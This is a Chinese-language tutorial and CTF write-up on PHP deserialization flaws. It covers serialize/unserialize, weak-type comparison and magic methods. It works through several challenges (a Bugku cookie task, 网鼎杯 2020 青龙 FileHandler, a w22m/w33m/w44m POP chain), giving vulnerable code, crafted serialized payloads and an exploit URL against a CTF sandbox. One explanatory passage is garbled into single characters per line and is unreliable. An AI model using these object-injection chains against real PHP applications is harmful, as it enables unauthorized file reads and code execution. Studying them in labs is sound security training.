WEB漏洞-反序列化之PHP
所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 --php官方文档
原理
未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候有可能触发对象中的一些魔术方法。
有类与无类
有类就是要依靠对象,无类就是不需要依靠
php弱类型
PHP 比较 2 个值是否相等可以用 " == “或 " === ”,” == " 会在比较时自动转换类型而不改变原来的值,因此这个符号经常出现漏洞。" == " 比较相等的一些常见值如下,当某些语句的判断条件是使用 " == "来判断时,就可以使用弱类型来替代。
无类
php:
serialize() //将一个对象转换为一个字符串
unserialize() //将字符串转换为一个对象
serialize()
<?php
$str = "lsc";
echo serialize($str);
?>
unserialize()
<?php
$str ="s:3:\"lsc\";";
echo unserialize($str);
?>
PHP 反序列化热身题-无类问题-本地
<?php
error_reporting(0);
include "flag.php";
$KEY = "xxx";
$str = $_GET['str'];
if (unserialize($str) === "$KEY")
{
echo "$flag";
}
show_source(__FILE__);
?>
flag.php
<?php
echo "flag...";
?>
将xxx字符串序列化带入url后面的参数str即可
CTF 反序列化小真题-无类执行-实例
这个靶场在bugku已经找不到了,所以就不贴地址了
打开题目flag.php,这是一个完全没有反应的登录页面。
根据提示用 GET 方法传递个 hint 参数,参数值随便(我觉得这个点毫无意义),得到题目的 PHP 源码。
源码中有 3 个部分,其中第二部分是我们看到的页面的源码,第三部分无意义,因此我们着重分析第一部分。
<?php
error_reporting(0); //关闭错误报告
include_once("flag.php"); //执行期间包含并运行指定文件 flag.php
$cookie = $_COOKIE['ISecer']; //$_COOKIE 变量在 ISecer 取回 cookie 的值
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
这段代码会取回 cookie 的值,unserialize 函数是对单一的已序列化的变量进行操作,将其转换回 PHP 的值。也就是说 unserialize 函数出现的地方是解题的关键,如果变量 cookie反序列化的结果和KEY 变量完全相同,就会显示 flag。因此我们需要传递一个名为 ISecer 的 cookie,里面的值应该是 $KEY 变量序列化后的结果。
注意这个时候我们并没有定义名为 KEY 的变量,因此这个变量的值应该是 NULL,此时可以直接写个简单的脚本看看序列化的结果是啥:
<?php
echo serialize("$KEY");
?>
可以得到 NULL 序列化后为“s:0:"";”,注意此时分号不可省略,但是提交时会被忽略,需要使用分号的 URL 编码 “%3b”来替代。此时可以直接用 HackBar 提交 cookie,也可以用 Burp 改 Cookie 字段提交获得 flag。
注意:在我网页源代码的最后面可以发现有$KEY
的变量赋值,那为什么我们赋值null就行了呢,是因为这个赋值是在else语句的后面,已经执行了if else语句,是不会到后面执行$KEY的变量赋值
有类
例如:O:4:“user”:2:{s:3:“age”;i:18;s:4:“name”;s:3:“LEO”;}
O代表对象;4代表对象名长度;2代表2个成员变量;其余参照如下
触发
unserialize函数的变量可控,文件中存在可利用的类,类中有魔术方法
魔术方法
构造函数和析构函数
__construct()
具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。
__destruct()
析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。
new出一个新的对象时就会调用__construct(),而对象被销毁时,例如程序退出时,就会调用__destruct()
__sleep() 和 __wakeup()
serialize() 函数会检查类中是否存在一个魔术方法 __sleep()。如果存在,该方法会先被调用,然后才执行序列化操作。此功能可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组。如果该方法未返回任何内容,则 null 被序列化,并产生一个 E_NOTICE 级别的错误。
注意:
__sleep() 不能返回父类的私有成员的名字。这样做会产生一个 E_NOTICE 级别的错误。可以用 Serializable 接口来替代。
__sleep() 方法常用于提交未提交的数据,或类似的清理操作。同时,如果有一些很大的对象,但不需要全部保存,这个功能就很好用。
与之相反,unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会先调用 __wakeup 方法,预先准备对象需要的资源。
__wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作
__serialize() 和 __unserialize()
serialize() 函数会检查类中是否存在一个魔术方法 __serialize()。如果存在,该方法将在任何序列化之前优先执行。它必须以一个代表对象序列化形式的 键/值 成对的关联数组形式来返回,如果没有返回数组,将会抛出一个 TypeError 错误。
注意:
如果类中同时定义了 __serialize() 和 __sleep() 两个魔术方法,则只有 __serialize() 方法会被调用。 __sleep() 方法会被忽略掉。如果对象实现了 Serializable 接口,接口的 serialize() 方法会被忽略,做为代替类中的 __serialize() 方法会被调用。
如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法,则只有 __unserialize() 方法会生效,__wakeup() 方法会被忽略。
_toString() //echo或者拼接字符串或者其他隐式调用该方法的操作都会触发
_construct() //创建对象时触发
_destruct() //对象被销毁时触发
_call() //在对象上下文中调用不可访问的方法时触发
_callstatic() //在静态上下文中调用不可访问的方法时触发
_get() //用于从不可访问的属性读取数据
CTF 反序列化练习题-有类魔术方法触发-本地
<?php
header("content-type:text/html;charset=utf8");
class ABC{
public $test;
function __construct(){
$test =1;
echo '调用了构造函数<br>';
}
function __destruct(){
echo '调用了析构函数<br>';
}
function __wakeup(){
echo '调用了苏醒函数<br>';
}
}
echo '创建对象 a<br>';
$a = new ABC;
echo '序列化<br>';
$a_ser=serialize($a);
echo '反序列化<br>';
$a_ser=unserialize($a_ser);
?>
效果:
分析:可以看在创建对象a的时候调用了__construct(),在序列化的时候因为没有在类中定义__sleep()和__serialize(),所以没有任何输出,在反序列化的时候调用了__wakeup(),那么为什么又调用了两次__destruct(),因为在刚开始创建了对象,最后会进行销毁,然后又反序列了一次,也创建了对象,最后也要销毁一次。
网鼎杯 2020 青龙大真题-有类魔术方法触发-实例
靶场
首先 ctf 命名及代码函数 unserialize 判断反序列化知识点
第一:获取 flag 存储 flag.php
第二:两个魔术方法__destruct __construct
第三:传输 str 参数数据后触发 destruct,存在 is_valid 过滤
第四:__destruct 中会调用 process,其中 op=1 写入及 op=2 读取
第五:涉及对象 FileHandler,变量 op 及 filename,content,进行构造输出
<?php
class FileHandler{
public $op=2;//我们可以利用弱类型绕过if判断
public $filename="flag.php";//文件开头调用的是 flag.php
public $content="xd";
}
$flag = new FileHandler();
$flag_1 = serialize($flag);
echo $flag_1;
?>
涉及:反序列化魔术方法调用,弱类型绕过,ascii 绕过
使用该类对 flag 进行读取,这里面能利用的只有__destruct 函数(析构函数)。__destruct 函数对
t
h
i
s
−
>
o
p
进
行
了
=
=
=
判
断
并
内
容
在
2
字
符
串
时
会
赋
值
为
1
,
p
r
o
c
e
s
s
函
数
中
使
用
=
=
对
this->op 进行了===判断并内容在 2 字符串时会赋值为 1,process 函数中使用==对
this−>op进行了===判断并内容在2字符串时会赋值为1,process函数中使用==对this->op 进行判
断(为 2 的情况下才能读取内容),因此这里存在弱类型比较,可以使用数字 2 或字符串’ 2’绕过判断。
is_valid 函数还对序列化字符串进行了校验,因为成员被 protected 修饰,因此序列化字符串中会出
现 ascii 为 0 的字符。经过测试,在 PHP7.2+的环境中,使用 public 修饰成员并序列化,反序列化后
成员也会被 public 覆盖修饰。
步骤:
1、序列化
2、传入url参数值
http://challenge-e016cbe5b8d0bf30.sandbox.ctfhub.com:10800/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;i:2;s:8:%22filename%22;s:8:%22flag.php%22;s:7:%22content%22;s:0:%22%22;}
3、右键网页查看源代码,成功获得flag
反序列化实战
源代码
<?php
show_source("test.php");
class w44m{
private $admin = 'aaa';
protected $passwd = '123456';
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
echo 'success';
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m;
}
}
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}();
return 0;
}
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?>
分析
源代码中有3个类,看完之后发现w44m类里面的Getflag函数里面有我们想要的东西
观察w33m发现有_toString()函数,然后又发现w22m里面有echo函数
所以可能是通过echo w22m对象 去触发_toString()函数
然后_toString()函数有个指针调用,我们可以利用这个调用Getflag()函数
那么我们如何触发echo函数呢,发现echo在_destruct()函数里面,可以通过反序列化w44m,来销毁触发_destruct()函数
综上所述我们可以构建如下payload:
payload
<?php
class w44m{
private $admin = 'w44m';
protected $passwd = '08067';
}
class w22m{
public $w00m='';
}
class w33m{
public $w00m;
public $w22m='Getflag';
}
$w2 = new w22m();
$temp = new w33m();
$w2->w00m=$temp;
$w2->w00m->w00m=new w44m();
echo serialize($w2);
?>
php在线执行
从右图中我们可以发现有个正方形乱码的东西,其实是%00
那么为什么是%00呢,而且为什么是%00w44m%00admin呢
php反序列化下的区别
public变量
直接变量名反序列化出来
protected变量
\x00 + * + \x00 + 变量名
可以用S:5:"\00*\00op"来代替s:5:"?*?op"
private变量
\x00 + 类名 + \x00 + 变量名
带入payload得出结果